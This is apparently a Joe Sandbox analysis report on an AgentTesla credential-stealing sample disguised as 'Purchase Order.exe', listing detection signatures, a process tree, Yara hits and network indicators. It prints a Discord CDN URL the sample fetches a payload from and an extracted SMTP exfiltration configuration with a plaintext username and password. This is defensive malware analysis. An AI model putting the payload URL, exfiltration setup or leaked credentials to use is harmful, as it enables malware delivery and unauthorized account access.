Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Order.exe

Overview

General Information

Sample Name:Purchase Order.exe
Analysis ID:618941
MD5:d88a146f731e00b42947ec060f3d4f43
SHA1:46243e85f209fdb306affd5eefb9ffe5fa3d2614
SHA256:d08b7126b81c09be7e54774cc35399faceef0c2d4732cbbca5d46c48d89a2f51
Tags:agentteslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Sigma detected: MSBuild connects to smtp port
Yara detected MSILDownloaderGeneric
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
.NET source code contains potential unpacker
Yara detected Generic Downloader
.NET source code contains very large array initializations
Executable has a suspicious name (potential lure to open the executable)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • Purchase Order.exe (PID: 1800 cmdline: "C:\Users\user\Desktop\Purchase Order.exe" MD5: D88A146F731E00B42947EC060F3D4F43)
    • cmd.exe (PID: 6416 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 20 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6456 cmdline: timeout 20 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • MSBuild.exe (PID: 6636 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
    • MSBuild.exe (PID: 6644 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
  • Puizg.exe (PID: 7008 cmdline: "C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exe" MD5: D88A146F731E00B42947EC060F3D4F43)
    • cmd.exe (PID: 6204 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 20 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 1568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 4288 cmdline: timeout 20 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • Puizg.exe (PID: 7144 cmdline: "C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exe" MD5: D88A146F731E00B42947EC060F3D4F43)
    • cmd.exe (PID: 5056 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 20 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6028 cmdline: timeout 20 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup
{"Exfil Mode": "SMTP", "Username": "finans@pilotgarage.com", "Password": "Fnns01Pg16", "Host": "mail.pilotgarage.com"}
SourceRuleDescriptionAuthorStrings
Purchase Order.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x1bb1:$x1: https://cdn.discordapp.com/attachments/
Purchase Order.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
    • 0x1bb1:$x1: https://cdn.discordapp.com/attachments/
    C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      SourceRuleDescriptionAuthorStrings
      00000011.00000002.504132970.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000011.00000002.504132970.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000000.00000002.372147247.0000000003ADC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000000.00000002.372147247.0000000003ADC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              00000000.00000002.372093079.0000000003A4D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                Click to see the 11 entries
                SourceRuleDescriptionAuthorStrings
                20.2.Puizg.exe.fa0000.0.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
                • 0x1bb1:$x1: https://cdn.discordapp.com/attachments/
                20.2.Puizg.exe.fa0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  0.2.Purchase Order.exe.740000.0.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
                  • 0x1bb1:$x1: https://cdn.discordapp.com/attachments/
                  0.2.Purchase Order.exe.740000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    0.0.Purchase Order.exe.740000.0.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
                    • 0x1bb1:$x1: https://cdn.discordapp.com/attachments/
                    Click to see the 46 entries

                    Networking

                    barindex
                    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 5.250.241.50, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 6644, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49771
                    No Snort rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 0.2.Purchase Order.exe.3a8cae8.2.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "finans@pilotgarage.com", "Password": "Fnns01Pg16", "Host": "mail.pilotgarage.com"}
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeReversingLabs: Detection: 30%
                    Source: 17.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                    Source: Purchase Order.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.4:49760 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49774 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49775 version: TLS 1.2
                    Source: Purchase Order.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                    Networking

                    barindex
                    Source: Yara matchFile source: Process Memory Space: Purchase Order.exe PID: 1800, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Puizg.exe PID: 7008, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Puizg.exe PID: 7144, type: MEMORYSTR
                    Source: Yara matchFile source: Purchase Order.exe, type: SAMPLE
                    Source: Yara matchFile source: 20.2.Puizg.exe.fa0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase Order.exe.740000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.Purchase Order.exe.740000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.0.Puizg.exe.280000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.0.Puizg.exe.fa0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.Puizg.exe.280000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exe, type: DROPPED
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: global trafficHTTP traffic detected: GET /attachments/968108194327052308/970585558680223784/Nqdkg_Cbadgewx.png HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/968108194327052308/970585558680223784/Nqdkg_Cbadgewx.png HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/968108194327052308/970585558680223784/Nqdkg_Cbadgewx.png HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
                    Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
                    Source: global trafficTCP traffic: 192.168.2.4:49771 -> 5.250.241.50:587
                    Source: global trafficTCP traffic: 192.168.2.4:49771 -> 5.250.241.50:587
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 8.248.119.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 8.248.119.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 8.248.119.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 8.248.119.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 8.248.119.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 8.248.119.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 8.248.119.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: MSBuild.exe, 00000011.00000002.508094226.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: MSBuild.exe, 00000011.00000002.508094226.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DGeKzF.com
                    Source: MSBuild.exe, 00000011.00000002.508094226.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                    Source: MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ac.economia.gob.mx/cps.html0
                    Source: MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ac.economia.gob.mx/last.crl0G
                    Source: MSBuild.exe, 00000011.00000003.399413894.0000000006D45000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://acedicom.edicomgroup.com/doc0
                    Source: MSBuild.exe, 00000011.00000003.398206126.0000000006449000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399053031.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
                    Source: MSBuild.exe, 00000011.00000003.398206126.0000000006449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
                    Source: MSBuild.exe, 00000011.00000003.399053031.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
                    Source: MSBuild.exe, 00000011.00000002.513485610.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.509801704.0000000003357000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
                    Source: MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
                    Source: MSBuild.exe, 00000011.00000003.398206126.0000000006449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
                    Source: MSBuild.exe, 00000011.00000003.398206126.0000000006449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
                    Source: MSBuild.exe, 00000011.00000003.398206126.0000000006449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
                    Source: MSBuild.exe, 00000011.00000003.398206126.0000000006449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/ocsp0
                    Source: MSBuild.exe, 00000011.00000003.398206126.0000000006449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
                    Source: MSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
                    Source: MSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crl0
                    Source: MSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crt0
                    Source: MSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crl
                    Source: MSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crt08
                    Source: MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
                    Source: MSBuild.exe, 00000011.00000003.398206126.0000000006449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
                    Source: MSBuild.exe, 00000011.00000002.513485610.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.509801704.0000000003357000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.507075685.000000000145C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.letsencrypt.org0
                    Source: MSBuild.exe, 00000011.00000002.513485610.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.509801704.0000000003357000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
                    Source: MSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.siths.se/sithsrootcav1.html0
                    Source: MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
                    Source: MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
                    Source: MSBuild.exe, 00000011.00000003.398206126.0000000006449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
                    Source: MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: MSBuild.exe, 00000011.00000003.399053031.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.defence.gov.au/pki0
                    Source: MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
                    Source: Purchase Order.exe, 00000000.00000002.371341648.0000000000E9F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.513485610.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, Puizg.exe, 00000014.00000002.515244833.0000000007D4D000.00000004.00000800.00020000.00000000.sdmp, Puizg.exe, 00000017.00000002.505962003.0000000000A04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: MSBuild.exe, 00000011.00000002.513485610.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.509801704.0000000003357000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
                    Source: MSBuild.exe, 00000011.00000002.514320253.0000000006D20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                    Source: MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.514404668.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.oces.trust2408.com/oces.crl0
                    Source: MSBuild.exe, 00000011.00000003.399506680.00000000064AA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.397896256.000000000647F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
                    Source: MSBuild.exe, 00000011.00000003.398032121.0000000006466000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398159493.0000000006466000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.513627151.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                    Source: MSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
                    Source: MSBuild.exe, 00000011.00000003.398014139.0000000006461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
                    Source: MSBuild.exe, 00000011.00000003.397677340.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
                    Source: MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                    Source: MSBuild.exe, 00000011.00000003.399232389.000000000640C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                    Source: MSBuild.exe, 00000011.00000002.507075685.000000000145C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                    Source: MSBuild.exe, 00000011.00000003.399569476.0000000006446000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.514663207.0000000006DE6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399483394.0000000006DE3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.513705001.000000000647F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.397896256.000000000647F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398047213.0000000006DD8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.397677340.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/CABD2A79A1076A31F21D253635CB0
                    Source: MSBuild.exe, 00000011.00000002.513485610.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.17.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                    Source: MSBuild.exe, 00000011.00000003.395492740.000000000647F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.396384984.000000000647F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?108821fec9101
                    Source: MSBuild.exe, 00000011.00000003.398325450.0000000006D3B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398231155.0000000006D2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://eca.hinet.net/repository/CRL2/CA.crl0
                    Source: MSBuild.exe, 00000011.00000003.398325450.0000000006D3B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398231155.0000000006D2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://eca.hinet.net/repository/Certs/IssuedToThisCA.p7b05
                    Source: MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.514404668.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
                    Source: MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.514404668.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
                    Source: MSBuild.exe, 00000011.00000003.399413894.0000000006D45000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
                    Source: MSBuild.exe, 00000011.00000003.399506680.00000000064AA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.397896256.000000000647F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
                    Source: Purchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: MSBuild.exe, 00000011.00000003.398231155.0000000006D2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
                    Source: MSBuild.exe, 00000011.00000002.509801704.0000000003357000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.pilotgarage.com
                    Source: MSBuild.exe, 00000011.00000003.398231155.0000000006D2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
                    Source: MSBuild.exe, 00000011.00000003.398325450.0000000006D3B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398231155.0000000006D2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.eca.hinet.net/OCSP/ocspG2sha20
                    Source: MSBuild.exe, 00000011.00000003.399451261.0000000006D38000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399030833.0000000006D35000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398231155.0000000006D2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.ncdc.gov.sa0
                    Source: MSBuild.exe, 00000011.00000003.399208416.0000000006D28000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399053031.0000000006D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
